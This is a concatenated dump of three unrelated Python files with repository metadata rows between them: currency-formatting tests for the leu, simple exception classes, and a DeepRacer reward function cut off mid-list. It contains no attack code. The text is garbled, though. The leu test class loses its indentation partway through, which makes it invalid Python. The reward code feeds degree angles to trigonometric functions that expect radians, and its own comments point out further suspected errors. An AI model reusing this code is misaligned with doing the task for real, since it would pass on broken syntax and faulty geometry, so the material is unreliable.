2021-07-27T01:15:50.000Z
|
tests/test_leu.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | null | null | null |
tests/test_leu.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Tests for the Leu currency representation(s)."""
from decimal import Context
from pytest import raises
from multicurrency import Currency
from multicurrency import (
CurrencyMismatchException,
CurrencyTypeException)
# Shared decimal arithmetic context for all tests: 28 significant digits with
# banker's rounding.  The Context() constructor already returns a fresh,
# independent object, so the previous trailing `.copy()` was redundant and
# has been dropped.
CONTEXT = Context(prec=28, rounding='ROUND_HALF_EVEN')
"""Tests for the Moldovan Leu representation."""
from multicurrency import MoldovanLeu
class TestMoldovanLeu:
    """MoldovanLeu currency tests.

    Fixes over the generated version:
    * ``test_moldovan_leu_changed`` matched the literal AttributeError text
      "can't set attribute", which Python 3.11+ replaced with
      "property ... has no setter"; the match pattern now accepts both.
    * Corrected the ``test_cmoldovan_leu_changed`` docstring typo.
    """

    def test_moldovan_leu(self):
        """test_moldovan_leu."""
        amount = CONTEXT.create_decimal(1) / CONTEXT.create_decimal(7)
        moldovan_leu = MoldovanLeu(amount=amount)
        decimal = CONTEXT.create_decimal(amount)
        assert moldovan_leu.amount == decimal
        assert moldovan_leu.numeric_code == '498'
        assert moldovan_leu.alpha_code == 'MDL'
        assert moldovan_leu.decimal_places == 2
        assert moldovan_leu.decimal_sign == ','
        assert moldovan_leu.grouping_places == 3
        assert moldovan_leu.grouping_sign == '.'
        assert not moldovan_leu.international
        assert moldovan_leu.symbol == 'L'
        assert not moldovan_leu.symbol_ahead
        assert moldovan_leu.symbol_separator == '\u00A0'
        assert moldovan_leu.localized_symbol == 'L'
        assert moldovan_leu.convertion == ''
        assert moldovan_leu.__hash__() == hash(
            (moldovan_leu.__class__, decimal, 'MDL', '498'))
        assert moldovan_leu.__repr__() == (
            'MoldovanLeu(amount: 0.1428571428571428571428571429, '
            'alpha_code: "MDL", '
            'symbol: "L", '
            'symbol_ahead: False, '
            'symbol_separator: "\u00A0", '
            'localized_symbol: "L", '
            'numeric_code: "498", '
            'decimal_places: "2", '
            'decimal_sign: ",", '
            'grouping_places: "3", '
            'grouping_sign: ".", '
            'convertion: "", '
            'international: False)')
        assert moldovan_leu.__str__() == '0,14 L'

    def test_moldovan_leu_negative(self):
        """test_moldovan_leu_negative."""
        amount = -100
        moldovan_leu = MoldovanLeu(amount=amount)
        decimal = CONTEXT.create_decimal(amount)
        assert moldovan_leu.numeric_code == '498'
        assert moldovan_leu.alpha_code == 'MDL'
        assert moldovan_leu.decimal_places == 2
        assert moldovan_leu.decimal_sign == ','
        assert moldovan_leu.grouping_places == 3
        assert moldovan_leu.grouping_sign == '.'
        assert not moldovan_leu.international
        assert moldovan_leu.symbol == 'L'
        assert not moldovan_leu.symbol_ahead
        assert moldovan_leu.symbol_separator == '\u00A0'
        assert moldovan_leu.localized_symbol == 'L'
        assert moldovan_leu.convertion == ''
        assert moldovan_leu.__hash__() == hash(
            (moldovan_leu.__class__, decimal, 'MDL', '498'))
        assert moldovan_leu.__repr__() == (
            'MoldovanLeu(amount: -100, '
            'alpha_code: "MDL", '
            'symbol: "L", '
            'symbol_ahead: False, '
            'symbol_separator: "\u00A0", '
            'localized_symbol: "L", '
            'numeric_code: "498", '
            'decimal_places: "2", '
            'decimal_sign: ",", '
            'grouping_places: "3", '
            'grouping_sign: ".", '
            'convertion: "", '
            'international: False)')
        assert moldovan_leu.__str__() == '-100,00 L'

    def test_moldovan_leu_custom(self):
        """test_moldovan_leu_custom."""
        amount = 1000
        moldovan_leu = MoldovanLeu(
            amount=amount,
            decimal_places=5,
            decimal_sign='.',
            grouping_places=2,
            grouping_sign=',',
            international=True,
            symbol_ahead=False,
            symbol_separator='_')
        decimal = CONTEXT.create_decimal(amount)
        assert moldovan_leu.amount == decimal
        assert moldovan_leu.numeric_code == '498'
        assert moldovan_leu.alpha_code == 'MDL'
        assert moldovan_leu.decimal_places == 5
        assert moldovan_leu.decimal_sign == '.'
        assert moldovan_leu.grouping_places == 2
        assert moldovan_leu.grouping_sign == ','
        assert moldovan_leu.international
        assert moldovan_leu.symbol == 'L'
        assert not moldovan_leu.symbol_ahead
        assert moldovan_leu.symbol_separator == '_'
        assert moldovan_leu.localized_symbol == 'L'
        assert moldovan_leu.convertion == ''
        assert moldovan_leu.__hash__() == hash(
            (moldovan_leu.__class__, decimal, 'MDL', '498'))
        assert moldovan_leu.__repr__() == (
            'MoldovanLeu(amount: 1000, '
            'alpha_code: "MDL", '
            'symbol: "L", '
            'symbol_ahead: False, '
            'symbol_separator: "_", '
            'localized_symbol: "L", '
            'numeric_code: "498", '
            'decimal_places: "5", '
            'decimal_sign: ".", '
            'grouping_places: "2", '
            'grouping_sign: ",", '
            'convertion: "", '
            'international: True)')
        assert moldovan_leu.__str__() == 'MDL 10,00.00000'

    def test_moldovan_leu_changed(self):
        """test_moldovan_leu_changed."""
        moldovan_leu = MoldovanLeu(amount=1000)
        # Python 3.11 changed the read-only property error message from
        # "can't set attribute" to "property '...' of '...' object has no
        # setter"; accept either so the test passes on old and new runtimes.
        read_only = r"can't set attribute|has no setter"
        # Every public attribute must be immutable after construction.
        for attribute, value in (
                ('amount', 999),
                ('alpha_code', 'EUR'),
                ('convertion', '0123456789,.'),
                ('symbol', '€'),
                ('symbol_ahead', False),
                ('symbol_separator', '_'),
                ('localized_symbol', '€'),
                ('numeric_code', '978'),
                ('decimal_places', 3),
                ('decimal_sign', ','),
                ('grouping_places', 4),
                ('grouping_sign', '.'),
                ('international', True)):
            with raises(AttributeError, match=read_only):
                setattr(moldovan_leu, attribute, value)

    def test_moldovan_leu_math_add(self):
        """test_moldovan_leu_math_add."""
        moldovan_leu_one = MoldovanLeu(amount=1)
        moldovan_leu_two = MoldovanLeu(amount=2)
        moldovan_leu_three = MoldovanLeu(amount=3)
        currency = Currency(amount=1, alpha_code='OTHER')
        with raises(
                CurrencyMismatchException,
                match='unsupported operation between currency MDL and OTHER.'):
            _ = moldovan_leu_one + currency
        with raises(
                CurrencyTypeException,
                match=(
                    'unsupported operation between <class \'multicurrency.'
                    'leu.MoldovanLeu\'> '
                    'and <class \'str\'>.')):
            _ = moldovan_leu_one.__add__('1.00')
        assert (
            moldovan_leu_one +
            moldovan_leu_two) == moldovan_leu_three

    def test_moldovan_leu_slots(self):
        """test_moldovan_leu_slots."""
        moldovan_leu = MoldovanLeu(amount=1000)
        with raises(
                AttributeError,
                match=(
                    '\'MoldovanLeu\' '
                    'object has no attribute \'new_variable\'')):
            moldovan_leu.new_variable = 'fail'  # pylint: disable=assigning-non-slot
"""Tests for the Leu representation."""
from multicurrency import Leu
class TestLeu:
"""Leu currency tests."""
def test_leu(self):
"""test_leu."""
amount = CONTEXT.create_decimal(1) / CONTEXT.create_decimal(7)
leu = Leu(amount=amount)
decimal = CONTEXT.create_decimal(amount)
assert leu.amount == decimal
assert leu.numeric_code == '946'
assert leu.alpha_code == 'RON'
assert leu.decimal_places == 2
assert leu.decimal_sign == ','
assert leu.grouping_places == 3
assert leu.grouping_sign == '.'
assert not leu.international
assert leu.symbol == 'L'
assert not leu.symbol_ahead
assert leu.symbol_separator == '\u00A0'
assert leu.localized_symbol == 'L'
assert leu.convertion == ''
assert leu.__hash__() == hash(
(leu.__class__, decimal, 'RON', '946'))
assert leu.__repr__() == (
'Leu(amount: 0.1428571428571428571428571429, '
'alpha_code: "RON", '
'symbol: "L", '
'symbol_ahead: False, '
'symbol_separator: "\u00A0", '
'localized_symbol: "L", '
'numeric_code: "946", '
'decimal_places: "2", '
'decimal_sign: ",", '
'grouping_places: "3", '
'grouping_sign: ".", '
'convertion: "", '
'international: False)')
assert leu.__str__() == '0,14 L'
def test_leu_negative(self):
"""test_leu_negative."""
amount = -100
leu = Leu(amount=amount)
decimal = CONTEXT.create_decimal(amount)
assert leu.numeric_code == '946'
assert leu.alpha_code == 'RON'
assert leu.decimal_places == 2
assert leu.decimal_sign == ','
assert leu.grouping_places == 3
assert leu.grouping_sign == '.'
assert not leu.international
assert leu.symbol == 'L'
assert not leu.symbol_ahead
assert leu.symbol_separator == '\u00A0'
assert leu.localized_symbol == 'L'
assert leu.convertion == ''
assert leu.__hash__() == hash(
(leu.__class__, decimal, 'RON', '946'))
assert leu.__repr__() == (
'Leu(amount: -100, '
'alpha_code: "RON", '
'symbol: "L", '
'symbol_ahead: False, '
'symbol_separator: "\u00A0", '
'localized_symbol: "L", '
'numeric_code: "946", '
'decimal_places: "2", '
'decimal_sign: ",", '
'grouping_places: "3", '
'grouping_sign: ".", '
'convertion: "", '
'international: False)')
assert leu.__str__() == '-100,00 L'
def test_leu_custom(self):
"""test_leu_custom."""
amount = 1000
leu = Leu(
amount=amount,
decimal_places=5,
decimal_sign='.',
grouping_places=2,
grouping_sign=',',
international=True,
symbol_ahead=False,
symbol_separator='_')
decimal = CONTEXT.create_decimal(amount)
assert leu.amount == decimal
assert leu.numeric_code == '946'
assert leu.alpha_code == 'RON'
assert leu.decimal_places == 5
assert leu.decimal_sign == '.'
assert leu.grouping_places == 2
assert leu.grouping_sign == ','
assert leu.international
assert leu.symbol == 'L'
assert not leu.symbol_ahead
assert leu.symbol_separator == '_'
assert leu.localized_symbol == 'L'
assert leu.convertion == ''
assert leu.__hash__() == hash(
(leu.__class__, decimal, 'RON', '946'))
assert leu.__repr__() == (
'Leu(amount: 1000, '
'alpha_code: "RON", '
'symbol: "L", '
'symbol_ahead: False, '
'symbol_separator: "_", '
'localized_symbol: "L", '
'numeric_code: "946", '
'decimal_places: "5", '
'decimal_sign: ".", '
'grouping_places: "2", '
'grouping_sign: ",", '
'convertion: "", '
'international: True)')
assert leu.__str__() == 'RON 10,00.00000'
    def test_leu_changed(self):
        """test_leu_changed."""
        leu = Leu(amount=1000)
        # Every public attribute is read-only; each assignment below must
        # raise AttributeError.
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.amount = 999
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.alpha_code = 'EUR'
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.convertion = '0123456789,.'
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.symbol = '€'
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.symbol_ahead = False
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.symbol_separator = '_'
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.localized_symbol = '€'
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.numeric_code = '978'
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.decimal_places = 3
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.decimal_sign = ','
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.grouping_places = 4
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.grouping_sign = '.'
        with raises(
            AttributeError,
            match='can\'t set attribute'):
            leu.international = True
def test_leu_math_add(self):
"""test_leu_math_add."""
leu_one = Leu(amount=1)
leu_two = Leu(amount=2)
leu_three = Leu(amount=3)
currency = Currency(amount=1, alpha_code='OTHER')
with raises(
CurrencyMismatchException,
match='unsupported operation between currency RON and OTHER.'):
_ = leu_one + currency
with raises(
CurrencyTypeException,
match=(
'unsupported operation between <class \'multicurrency.'
'leu.Leu\'> '
'and <class \'str\'>.')):
_ = leu_one.__add__('1.00')
assert (
leu_one +
leu_two) == leu_three
def test_leu_slots(self):
"""test_leu_slots."""
leu = Leu(amount=1000)
with raises(
AttributeError,
match=(
'\'Leu\' '
'object has no attribute \'new_variable\'')):
leu.new_variable = 'fail' # pylint: disable=assigning-non-slot
| 36.072727
| 84
| 0.538432
| 1,503
| 15,872
| 5.405855
| 0.085163
| 0.120492
| 0.089969
| 0.099938
| 0.856615
| 0.814892
| 0.795815
| 0.789908
| 0.7776
| 0.755815
| 0
| 0.029596
| 0.346459
| 15,872
| 439
| 85
| 36.154897
| 0.753302
| 0.035849
| 0
| 0.754476
| 0
| 0
| 0.152174
| 0.004097
| 0
| 0
| 0
| 0
| 0.245524
| 1
| 0.030691
| false
| 0
| 0.015345
| 0
| 0.051151
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4af2cee59291280c406b9f9ce445aaae5f3834af
| 797
|
py
|
Python
|
mercurius/exceptions.py
|
bossiernesto/mercurius
|
9c4bc26f45a317d4e22137b412f63f18976461fe
|
[
"BSD-2-Clause"
] | 2
|
2015-05-27T20:38:29.000Z
|
2017-02-16T11:48:05.000Z
|
mercurius/exceptions.py
|
bossiernesto/mercurius
|
9c4bc26f45a317d4e22137b412f63f18976461fe
|
[
"BSD-2-Clause"
] | 3
|
2015-01-15T23:32:45.000Z
|
2015-01-15T23:49:05.000Z
|
mercurius/exceptions.py
|
bossiernesto/mercurius
|
9c4bc26f45a317d4e22137b412f63f18976461fe
|
[
"BSD-2-Clause"
] | null | null | null |
class ConfigError(Exception):
    """Raised for configuration-related failures.

    The explicit ``__init__`` that merely delegated to
    ``Exception.__init__`` was redundant boilerplate and has been
    removed; construction behavior is unchanged.
    """
class MercuryUnsupportedService(Exception):
    """Raised when an unsupported service is requested.

    NOTE(review): naming is inconsistent with the ``Mercurius*``
    exceptions below; renaming would break callers, so it is kept.
    The redundant delegating ``__init__`` has been removed.
    """
class MercuryConnectException(Exception):
    """Raised for connection failures.

    The redundant delegating ``__init__`` has been removed; behavior is
    unchanged.
    """
class MercuriusRequestException(Exception):
    """Raised for request-level failures.

    The redundant delegating ``__init__`` has been removed; behavior is
    unchanged.
    """
class MercuriusHTTPException(Exception):
    """Raised for HTTP-level failures.

    The redundant delegating ``__init__`` has been removed; behavior is
    unchanged.
    """
class MercuriusHeaderException(Exception):
    """Raised for header-related failures.

    The redundant delegating ``__init__`` has been removed; behavior is
    unchanged.
    """
| 30.653846
| 49
| 0.690088
| 78
| 797
| 6.435897
| 0.166667
| 0.191235
| 0.286853
| 0.430279
| 0.731076
| 0.731076
| 0.731076
| 0.731076
| 0.731076
| 0.731076
| 0
| 0
| 0.166876
| 797
| 25
| 50
| 31.88
| 0.756024
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
4af66b49747ff9477eb663df7989dbbcaf6a6e09
| 96,643
|
py
|
Python
|
tboneReward.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | null | null | null |
tboneReward.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | null | null | null |
tboneReward.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | 1
|
2021-02-12T10:06:51.000Z
|
2021-02-12T10:06:51.000Z
|
# model name: tbone-015
#
import math
class HISTORY:
    """Mutable class-level store of the previous call's telemetry.

    ``reward_function`` reads the previous step's values from these
    attributes and overwrites them at the end of every invocation, so
    this class acts as a module-level global between calls.
    """
    stepsPerSecond = 64  # assumed simulator step rate; drives step_duration
    lookAheadSteps = 32  # number of future steps reward_function projects
    prev_speed=None
    prev_steering_angle=None
    prev_steps=None
    prev_distance_centerline=None
    prev_location=(0.00,0.00)
    # Duration of one simulator step, in seconds.
    step_duration = float(1 / stepsPerSecond)
    prev_total_reward = None
    prev_heading = None
    prev_closest_waypoints = None
class RaceStep:
    """One (actual or projected) race step and its computed reward.

    stepNum 0 reconstructs the previous step from HISTORY, stepNum 1 is
    the current simulator step, and any larger stepNum is a look-ahead
    step whose closest waypoints and center distance must be estimated.
    """

    def __init__(self, stepParams, params, stepNum):
        """Resolve location/waypoints/center offset, then score the step.

        stepParams: per-step dict ("location", "heading", "stepNumber", ...).
        params: the raw DeepRacer params dict for the current call.
        stepNum: 0 = previous step, 1 = current step, >1 = projection.
        """
        if stepNum == 0:
            # Previous step: fall back to defaults when HISTORY is still
            # empty (the very first reward_function invocation).
            self.location = HISTORY.prev_location
            self.closest_waypoints = (
                HISTORY.prev_closest_waypoints
                if HISTORY.prev_closest_waypoints is not None else (0, 1))
            self.distance_from_center = (
                HISTORY.prev_distance_centerline
                if HISTORY.prev_distance_centerline is not None else 0.00)
        elif stepNum == 1:
            # Current step: the simulator supplies exact values.
            self.location = stepParams["location"]
            self.closest_waypoints = params["closest_waypoints"]
            self.distance_from_center = params["distance_from_center"]
        else:
            # Projected step: estimate everything from the projected location.
            self.location = stepParams["location"]
            self.closest_waypoints = getClosestWaypoints(
                self.location, stepParams, params)
            self.distance_from_center = calcDistanceFromCenter(
                self.closest_waypoints, self.location, stepParams, params)
        print("closest_waypoints: " + str(self.closest_waypoints))
        print("distance_from_center: " + str(self.distance_from_center))
        # On track while the center offset is below half the track width.
        self.onTrack = (params["track_width"] * .5) > self.distance_from_center
        # Off-track steps earn nothing.
        self.stepReward = (
            self.calcStepReward(stepParams, params) if self.onTrack else 0)
        self.stepNumber = stepParams["stepNumber"]

    def calcStepReward(self, stepParams, params):
        """Combine centerline-following and progress rewards for this step."""
        rewardParams = params.copy()
        # Score against this step's (possibly projected) values, not the
        # raw simulator params.
        rewardParams["distance_from_center"] = self.distance_from_center
        rewardParams["closest_waypoints"] = self.closest_waypoints
        centerline_reward = follow_centerline(rewardParams)
        rewardParams["heading"] = stepParams["heading"]
        curProg = progress(rewardParams)
        return float(centerline_reward + curProg)
def calcDistanceFromCenter(closest_waypoints,location,stepParams, params):
    """Estimate the car's offset from the track centerline for a projected step.

    Builds a triangle from the closest-waypoint segment and the car's
    offset, then solves for the perpendicular distance (segHZ).
    NOTE(review): several suspicious spots are flagged inline below.
    """
    waypoints = params["waypoints"]
    segGH = (location[1]-waypoints[closest_waypoints[0]][1]) if closest_waypoints[0] != -1 else (location[1]-waypoints[0][1])
    # NOTE(review): the else branch below uses location[1] (a y value) in
    # what looks like an x-delta; location[0] was probably intended — confirm.
    segOG = (location[0]-waypoints[closest_waypoints[0]][0]) if closest_waypoints[0] != -1 else (location[1]-waypoints[0][0])
    stepHeading = params["heading"]
    # print("Closest Waypoints: ")
    # print(str(closest_waypoints))
    # Vector from previous to next closest waypoint.
    wayPointY = waypoints[closest_waypoints[1]][1]-waypoints[closest_waypoints[0]][1]
    wayPointX = waypoints[closest_waypoints[1]][0]-waypoints[closest_waypoints[0]][0]
    wayPointZ = math.sqrt((wayPointX ** 2)+(wayPointY ** 2))
    # Calculate the direction in radius, arctan2(dy, dx), the result is (-pi, pi) in radians
    track_direction = math.atan2(wayPointY, wayPointX)
    # Convert to degree
    track_direction = math.degrees(track_direction)
    # NOTE(review): this branch assigns 180 - stepHeading, while the elif
    # adjusts track_direction itself; 180 - track_direction may have been
    # intended — confirm.
    if track_direction > 90 and track_direction < 180:
        track_direction = 180 - stepHeading
    elif track_direction < -90 and track_direction > -180:
        track_direction = track_direction + 180
    # Fold the heading into the same half-plane.
    if stepHeading > 90 and stepHeading < 180:
        stepHeading = 180 - stepHeading
    elif stepHeading < -90 and stepHeading > -180:
        stepHeading = stepHeading + 180
    # NOTE(review): math.sin expects radians, but stepHeading and
    # track_direction are in degrees here — math.radians(...) was likely
    # intended; confirm before relying on these distances.
    if stepHeading != track_direction:
        segOH = segGH/math.sin(stepHeading-track_direction) if stepHeading > track_direction else segGH/math.sin(track_direction - stepHeading)
        segHZ = math.sin(stepHeading-track_direction) * segOH if stepHeading > track_direction else math.sin(track_direction-stepHeading) * segOH
    else:
        # Heading exactly along the track: no perpendicular offset.
        segOH = 0
        segHZ = 0
    print("calcDistance: track_direction: "+str(track_direction)+", stepHeading: "+str(stepHeading)+", segOH: "+str(segOH)+", segHZ: "+str(segHZ))
    return segHZ
def getClosestWaypoints(location,stepParams, params):
    """Find the (previous, next) waypoint index pair bracketing *location*.

    Scans every waypoint for the one nearest to the projected location,
    then orders the returned pair according to the direction of travel.

    location: (x, y) projected car position.
    stepParams: unused; kept for signature compatibility with callers.
    params: DeepRacer params dict (needs "waypoints", "closest_waypoints",
        "heading").
    Returns a (prev_index, next_index) tuple.
    """
    waypoints = params["waypoints"]
    startWaypoints = params["closest_waypoints"]
    # Default to the simulator's closest waypoint if nothing is nearer
    # than the 100-unit sentinel distance.
    curClosestWaypointIndex = startWaypoints[0]
    curClosestDistance = 100
    # Heading strictly inside (-90, 90) degrees means travel in +x.
    # Bug fix: the original `< 90 or > -90` was always True for any
    # number; the intended conjunction is `and` (a range test).
    posHeading = -90 < params["heading"] < 90
    for num, waypoint in enumerate(waypoints):
        # Euclidean distance from this waypoint to the projected location.
        dx = waypoint[0] - location[0]
        dy = waypoint[1] - location[1]
        z = math.sqrt(dx * dx + dy * dy)
        if z < curClosestDistance:
            curClosestDistance = z
            curClosestWaypointIndex = num
    # Order the pair so it reads (behind, ahead) relative to travel.
    if posHeading:
        if waypoints[curClosestWaypointIndex][0] > location[0]:
            return (curClosestWaypointIndex - 1, curClosestWaypointIndex)
        return (curClosestWaypointIndex, curClosestWaypointIndex + 1)
    if waypoints[curClosestWaypointIndex][0] > location[0]:
        return (curClosestWaypointIndex, curClosestWaypointIndex - 1)
    return (curClosestWaypointIndex - 1, curClosestWaypointIndex)
def getDistanceCenterLine (track_width, distance_from_center):
    """Return how far inside the half-track-width the car currently is."""
    half_width = track_width * .50
    return half_width - distance_from_center
def isPOSHeading(currentHeading):
    """Return True when *currentHeading* (degrees) points in +x direction.

    Bug fix: the original `< 90 or > -90` was a tautology — True for
    every number.  The intended test is the range -90 < heading < 90.
    """
    return -90 < currentHeading < 90
def getFutureHeading(params):
    """Project the heading after the current steering angle is applied."""
    heading = params["heading"]
    steering = params["steering_angle"]
    # Steering adds to the heading when travelling in +x, subtracts otherwise.
    if isPOSHeading(heading):
        return heading + steering
    return heading - steering
def getCurLocation(stepDuration, params):
    """Project the car's [x, y] location *stepDuration* seconds ahead.

    Treats the travelled distance (speed * duration) as a hypotenuse and
    splits it into x/y components along the projected heading.
    """
    stepHypo = stepDuration * params["speed"]
    futureHeading = getFutureHeading(params)
    # NOTE(review): math.sin/cos expect radians, but futureHeading appears
    # to be in degrees — math.radians(futureHeading) was probably
    # intended; confirm.
    stepOpp = math.sin(futureHeading) * stepHypo
    stepAdj = math.cos(futureHeading) * stepHypo
    x = stepAdj + params["x"]
    y = stepOpp + params["y"]
    print("step location: "+ str(x) + ", " + str(y))
    return [x,y]
def inside_borders(params):
    """Reward staying on track, with a bonus for hugging the center line."""
    on_track = params['all_wheels_on_track']
    center_offset = params['distance_from_center']
    width = params['track_width']
    # Off track earns the default (zero) reward.
    if not on_track:
        return 0
    base = 0.50
    half_width = 0.5 * width
    # Bonus scales from 0 at the border to 1 on the center line.
    bonus = (half_width - center_offset) / half_width
    # Triple the bonus when the car is very close to the center line.
    if bonus > 0.80:
        bonus = bonus * 3.00
    return base + bonus
def speed(params):
    """Reward proportional to speed, granted only near the center line."""
    SPEED_THRESHOLD = 4.00
    current_speed = params['speed']  # renamed: no longer shadows the function
    width = params['track_width']
    center_offset = params['distance_from_center']
    # No speed reward unless the car is within 10% of track width of center.
    if center_offset >= width * .10:
        return 0
    return 1.00 * (current_speed / SPEED_THRESHOLD)
def progress(params):
    """Cubic reward on the completed fraction of the track, scaled by 1.5."""
    prog = params["progress"]
    print("Progress: "+str(prog))
    fraction = prog / 100
    return float(1.5 * fraction ** 3)
def follow_centerline(params):
    """Reward the agent for staying close to the center line.

    Maximum reward exactly on the center line, linear falloff to the
    track border.
    """
    width = params['track_width']
    offset = params['distance_from_center']
    half_width = width * .50
    delta = half_width - offset
    if offset == 0:
        return float(3.0)
    return float(3.0 * (delta / half_width))
def direction_and_waypoint(params):
    """Reward alignment between the car's heading and the track direction.

    Uses the two closest waypoints to compute the center line's bearing
    and scales a base reward of 3.0 down linearly as the misalignment
    grows toward 180 degrees.
    """
    waypoints = params['waypoints']
    closest_waypoints = params['closest_waypoints']
    # Treat a missing heading as 0 degrees (idiom fix: `is not None`).
    heading = params['heading'] if params['heading'] is not None else 0.00
    reward = 3.0
    # Direction of the center line based on the closest waypoints.
    next_point = waypoints[closest_waypoints[1]]
    prev_point = waypoints[closest_waypoints[0]]
    # atan2(dy, dx) gives (-pi, pi) radians; convert to degrees.
    track_direction = math.atan2(next_point[1] - prev_point[1], next_point[0] - prev_point[0])
    track_direction = math.degrees(track_direction)
    # Absolute angular difference folded into [0, 180].
    direction_diff = abs(track_direction - heading)
    if direction_diff > 180:
        direction_diff = 360 - direction_diff
    print("Heading: "+str(heading)+", Track Direction: "+str(track_direction))
    # Scale the reward linearly toward 0 as misalignment approaches 180.
    reward = float(reward * ((180-direction_diff)/180))
    return reward
def reward_function(params):
    '''
    Use the weighted reward matrix to generate a reward

    Scores the previous step, the current step, and up to
    HISTORY.lookAheadSteps projected future steps, summing each step's
    reward for as long as the projected car stays on track, then updates
    HISTORY with the current step before returning the total.
    '''
    # Create Steps to Evaluate
    print(params)
    steps = []
    stepLocations = []
    stepRewards = []
    curStep=2
    rewardTotal=0
    # Step 0: reconstruct the previous step from HISTORY.
    stepLocations.append(HISTORY.prev_location)
    steps.append(RaceStep({
        "location": HISTORY.prev_location,
        "speed": HISTORY.prev_speed,
        "distance_centerline": HISTORY.prev_distance_centerline,
        "heading": HISTORY.prev_heading,
        "stepNumber":0
    }, params,0))
    rewardTotal += steps[0].stepReward
    stepRewards.append(steps[0].stepReward)
    # Step 1: the actual current step from the simulator params.
    stepLocations.append((params["x"],params["y"]))
    steps.append(RaceStep({
        "location": (params["x"],params["y"]),
        "speed": params["speed"],
        "distance_centerline": params["distance_from_center"],
        "heading": params["heading"],
        "stepNumber":1
    }, params,1))
    rewardTotal += steps[1].stepReward
    stepRewards.append(steps[1].stepReward)
    # Steps 2..lookAheadSteps: project future locations and keep adding
    # their rewards until the projection leaves the track; once off track,
    # every remaining projected step contributes 0.
    stillOnTrack = True
    while curStep < HISTORY.lookAheadSteps+1:
        stepLocation = getCurLocation((HISTORY.step_duration * curStep),params)
        stepLocations.append(stepLocation)
        steps.append(RaceStep({
            "location": stepLocation,
            "speed": params["speed"],
            "distance_centerline": None,
            "heading": getFutureHeading(params),
            "stepNumber":curStep
        }, params,curStep))
        if steps[curStep].onTrack and stillOnTrack:
            rewardTotal += steps[curStep].stepReward
            stepRewards.append(steps[curStep].stepReward)
        else:
            stillOnTrack = False
            rewardTotal += 0
            stepRewards.append(0)
        print("LookAhead Step: "+ str(curStep) +" Award: "+str(rewardTotal))
        curStep+=1
    print("stepLocations: ")
    print(str(stepLocations))
    print("stepRewards: ")
    print(str(stepRewards))
    # Persist the current step's telemetry for the next invocation.
    HISTORY.prev_location = (params["x"],params["y"])
    HISTORY.prev_speed=params["speed"]
    HISTORY.prev_steering_angle=params["steering_angle"]
    HISTORY.prev_steps=params["steps"]
    HISTORY.prev_distance_centerline=params["distance_from_center"]
    HISTORY.prev_heading = params["heading"]
    HISTORY.prev_total_reward = rewardTotal
    return float(rewardTotal)
def main():
params = [
{'is_left_of_center': False, 'projection_distance': 0.1399085926407269, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), 